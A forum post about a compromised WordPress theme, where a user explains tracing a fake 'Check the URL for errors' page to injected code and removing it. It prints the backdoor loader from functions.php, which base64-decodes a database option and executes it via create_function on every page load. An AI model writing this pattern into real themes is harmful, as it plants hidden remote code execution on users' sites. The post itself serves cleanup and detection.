Divi WordPress Theme
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WordPress fix Reply To: Check the URL for errors message appearing on all my blog pages

Discussion in 'Misc WordPress Requests' started by ScorpionGod, Mar 7, 2018.

1. ScorpionGod

Reply To: Check the URL for errors message appearing on all my blog pages, by ScorpionGod

Hi guys,
    So I had this problem for one of my client sites today and I too had that exact code @jtrue75 posted above. However, once I deactivated the Theme those codes went away.

Then after searching every possible way, I searched for base64 codes and found this code at the end of functions.php

/**
    * Theme localization
    */
    load_theme_textdomain( 'realto', get_template_directory() . '/languages' );
    $locale = get_locale();
    $locale_file = get_template_directory() . "/languages/$locale.php";
    if ( is_readable($locale_file) ) require_once($locale_file);
    add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );

add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) );

Then this code output the following HTML codes where the_content is used.

<html><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Page Not Found</title><style>html {
    height: 100%;
    width: 100%;
    }
    body {
    position: absolute;
    width: 100%;
    margin: 0;
    top: 20%;
    font-family: Verdana, Geneva, sans-serif;
    text-align: center;
    }

h1 {
    font-size: 32px;
    margin-bottom: 22px;
    }

h1, h3 {
    font-weight: normal;
    color: #4E4E4E;
    }

h3 {
    font-size: 19px;
    margin-left: auto;
    margin-right: auto;
    }</style><script src="embeddedErrorPage.js?708hoiacggua3jxbg5d902uik9"></script></head></html><body><h1>The page you were looking for could not be found.</h1><h3>Check the URL for errors.</h3></body>

This was the DB entry called by the above base64 code.

[malware code removed – please don’t post that here.]

Simply removing or commenting out the the base64 code at the functions.php file is enough. Hope this helps everybody.

Kind regards,
    ScorpionGod

Reply To: Check the URL for errors message appearing on all my blog pages